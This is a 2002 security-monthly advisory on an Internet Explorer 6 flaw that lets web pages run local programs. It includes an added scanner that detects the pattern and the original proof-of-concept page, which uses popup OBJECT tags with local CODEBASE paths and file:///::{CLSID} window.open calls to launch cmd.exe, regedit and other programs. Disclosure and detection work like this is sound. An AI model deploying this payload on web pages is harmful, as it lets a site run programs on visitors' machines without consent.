NSFOCUS Security Monthly, Issue 28: Latest Vulnerabilities
Microsoft IE Arbitrary Program Execution Vulnerability

Date: 2002-01-20

Affected systems:
Microsoft Internet Explorer 6.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000

Unaffected systems:

Description:
--------------------------------------------------------------------------------


BUGTRAQ  ID: 3867

Microsoft IE is the popular web browser bundled with Windows.

Microsoft IE has a design flaw that allows a remote attacker to execute arbitrary programs on the host through IE.

On 24 June 2000, http-equiv <http-equiv@excite.com> published an IE vulnerability that allowed a malicious website to execute arbitrary programs on the client machine viewing its page. By embedding an object in the page whose CLASSID is a non-zero value and whose CODEBASE parameter points to any executable already on the client, the program on the client was run when the user viewed the page.

Although this flaw is believed to have been patched in later IE versions, IE is still affected. When a new object is created through a window.PoPup() or window.Open() call and the object's CODEBASE value points to an executable on the client machine, that program is executed. This vulnerability may share an underlying flaw with the one http-equiv reported. Exploiting it allows arbitrary programs to be run on the client; it has been confirmed in IE 6.0, and earlier IE versions may also be affected.

<*Source: the Pull (osioniusx@yahoo.com)
  
  Links: http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html
         http://home.austin.rr.com/wiredgoddess/thepull/advisory4.html
*>
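Both mechanisms described above leave a recognisable footprint in the page source: an OBJECT element whose CODEBASE names a file already on the client instead of a download URL, and a file:///::{CLSID} shell-namespace URL handed to window.open(). The following Node.js scanner is an added example, not code from the advisory or from the Pull; it is the kind of check a proxy, mail gateway or content filter could run on HTML before a legacy client renders it. The sample page it scans is constructed here (it reuses the CLSID values that appear in the advisory's test program) and also contains an ordinary remote CODEBASE that must not be flagged.

```javascript
"use strict";

// Added example (not from the advisory or from the Pull's test page):
// a static scanner for the two IE 6 patterns the advisory describes,
// meant for a proxy, mail gateway or content filter that inspects HTML
// before a legacy client renders it. It is a mitigation aid, not a patch.

// An <OBJECT ...> start tag; its attribute text is captured for parsing.
const OBJECT_TAG_RE = /<object\b([^>]*)>/gi;
// name="value", name='value' or bare name=value attribute pairs.
const ATTR_RE = /([a-z][\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
// file:///::{CLSID} shell-namespace URL, optionally with further /::{CLSID} segments.
const SHELL_NAMESPACE_RE = /file:\/{2,3}(?:::\{[0-9a-f-]{36}\}\/?)+/gi;

// CODEBASE is meant to hold a download URL for a control; anything that
// resolves to a file already on the client is what this advisory is about.
function isLocalCodebase(value) {
  const v = value.trim();
  return (
    /^[a-z]:[\\/]/i.test(v) ||   // drive letter, e.g. c:/cmd.exe or C:\winnt\regedit.exe
    /^\\\\/.test(v) ||           // UNC path, e.g. \\server\share\x.exe
    /^file:/i.test(v) ||         // file: URL
    /^\/[^/]/.test(v)            // root-relative path, e.g. /winnt/system32/cmd.exe
  );
}

// Turn the raw attribute text of a tag into a lower-cased name -> value map.
function parseAttributes(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] =
      m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
  }
  return attrs;
}

// Scan one HTML document as raw text (so OBJECT markup hidden inside a
// script string literal, as in the popup technique, is seen too) and
// return every suspicious construct with its byte offset.
function scanHtml(html) {
  const findings = [];
  for (const tag of html.matchAll(OBJECT_TAG_RE)) {
    const attrs = parseAttributes(tag[1]);
    if (attrs.codebase !== undefined && isLocalCodebase(attrs.codebase)) {
      findings.push({
        kind: "local-codebase",
        classid: attrs.classid || "",
        codebase: attrs.codebase,
        offset: tag.index,
      });
    }
  }
  for (const url of html.matchAll(SHELL_NAMESPACE_RE)) {
    findings.push({ kind: "shell-namespace-url", url: url[0], offset: url.index });
  }
  return findings;
}

// Constructed sample page: one popup OBJECT with a local CODEBASE, one
// shell-namespace window.open() (CLSIDs taken from the advisory's test
// program), and one ordinary remote CODEBASE that must not be flagged.
const SAMPLE_PAGE = `<html><body>
<script>
var oPopup = window.createPopup();
oPopup.document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/calc.exe"></OBJECT>';
function openControlPanel() { window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-1069-A2DD-08002B30309D}"); }
</script>
<OBJECT CLASSID="CLSID:00000000-0000-0000-0000-000000000000" CODEBASE="https://example.invalid/control.cab#version=1,0,0,0"></OBJECT>
</body></html>`;

for (const f of scanHtml(SAMPLE_PAGE)) {
  console.log(`${f.kind} at offset ${f.offset}: ${f.codebase || f.url}`);
}
```

Run with `node scan.js`; on the constructed page it reports one local-codebase finding (the calc.exe OBJECT inside the popup) and one shell-namespace-url finding, and stays silent on the remote CAB reference. The scanner deliberately works on the raw text rather than a parsed DOM, because the advisory's popup technique keeps the OBJECT markup inside a JavaScript string that only becomes DOM when innerHTML is assigned at run time.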

Test program:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!



the Pull (osioniusx@yahoo.com) provided the following test code:

funRun.html:

<HTML>
<HEAD>
<TITLE>Extensibility Page</TITLE>

<SCRIPT LANGUAGE="JScript">
//BELOW POPUP CODE
var oPopup = window.createPopup();

function openPopupCMD()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/cmd.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/cmd.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/explorer.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openRegedit()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/Regedit.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/regedit.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openCalc()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/calc.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/calc.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openFTP()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/FTP.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/FTP.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openPopupCleanMGR()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/cleanmgr.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/cleanmgr.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}


function openGames()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/Program Files/Plus!/PINBALL.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="C:/Program Files/Windows NT/Pinball/Pinball.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/MSHEARTS.EXE"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="C:/winnt/system32/winmine.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}

function openPaint()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/Program Files/Accessories/mspaint.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/mspaint.exe"></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}



</SCRIPT>



<SCRIPT LANGUAGE="JScript">
//BELOW file://::{CLSID} code

function openControlPanel()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-1069-A2DD-08002B30309D}");
}

function openFonts()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-1069-A2DD-08002B30309D}/::{D20EA4E1-3957-11d2-A40B-0C5020524152}");
}

function openAdminTools()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-1069-A2DD-08002B30309D}/::{D20EA4E1-3957-11d2-A40B-0C5020524153}");
}

function openDialUpNetworking()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{992CFFA0-F557-101A-88EC-00DD010CCC48}");
}

function openNetworkNeighborhood()
{
window.open("file:///::{208D2C60-3AEA-1069-A2D7-08002B30309D}");
}

function openTasks()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}");
}

function openRecycleBin()
{
window.open("file:///::{645FF040-5081-101B-9F08-00AA002F954E}");
}

function openMyDocuments()
{
window.open("file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/");
}

</SCRIPT>

</HEAD>
<BODY >
<h1>Internet Explorer Fun Run Page</h1>
<p>[For Internet Explorer 6 with updates q312361,q240308, and q313675, possibly
earlier versions.]</p>
<p> Click your mouse over the words below and have some fun seeing what remote website
authors can run on your system at their convenience. While this is amusing and startling,
with a few loops it could cause a bit of a catastrophe on your system. Combined with other
exploits: force fed trojans could be run; possibly command parameters run; or directory
traversal (client side) exploits.

I have included demonstrations here of the PopUp OBJECT tag bug as well as the
"directoryInfo" bug because they have similar results and combine to paint an interesting
picture.
<BR>
Be sure and clean out your "Downloaded Program Files" directory when done.
<BR>
Note: File paths made for Windows 2000 and Windows ME.

</P>
<BR><BR>
Pop-Up Exploit Stuff - Click on the Words Below<BR>
_________________________________________
<p onclick = "openPopupCMD();"><U><FONT color="#3333FF">Command</FONT></U></p>
<p onclick = "openRegedit()"><U><FONT color="#3333FF">Regedit</FONT></U></p>
<p onclick = "openCalc()"><U><FONT color="#3333FF">Calculator</FONT></U></p>
<p onclick = "openFTP()"><U><FONT color="#3333FF">FTP</FONT></U></p>
<p onclick = "openPopupCleanMGR()"><U><FONT color="#3333FF">CleanManager</FONT></U></p>
<p onclick = "openGames()"><U><FONT color="#3333FF">Games</FONT></U></p>
<p onclick = "openPaint()"><U><FONT color="#3333FF">Paint</FONT></U></p>

File:{CLSID} Stuff - Click on the Words Below<BR>
_________________________________________
<p onclick = "openControlPanel()"><U><FONT color="#3333FF">Control Panel</FONT></U></p>
<p onclick = "openFonts()"><U><FONT color="#3333FF">Fonts</FONT></U></p>
<p onclick = "openAdminTools()"><U><FONT color="#3333FF">Admin Tools</FONT></U></p>
<p onclick = "openDialUpNetworking()"><U><FONT color="#3333FF">Dial Up Networking</FONT></U></p>
<p onclick = "openNetworkNeighborhood()"><U><FONT color="#3333FF">Network Neighborhood</FONT></U></p>
<p onclick = "openTasks()"><U><FONT color="#3333FF">Tasks</FONT></U></p>
<p onclick = "openRecycleBin()"><U><FONT color="#3333FF">Recycle Bin</FONT></U></p>
<p onclick = "openMyDocuments()"><U><FONT color="#3333FF">My Documents</FONT></U></p>


<BR><BR><BR>

</BODY>
</HTML>



--------------------------------------------------------------------------------
Recommendations:

Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Disable Active Scripting in IE:
  Choose "Tools" -> "Internet Options..." -> "Security" -> "Internet" (or another zone, such as "Local intranet" or "Trusted sites")
  Click "Custom Level", under "Security Settings" select "Scripting" -> "Active scripting", set it to "Disable", and press "OK" to save the setting.

Vendor patch:

Microsoft
---------
The vendor has not yet released a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version:

http://www.microsoft.com/windows/ie/default.asp

All rights reserved. Reproduction without permission is prohibited.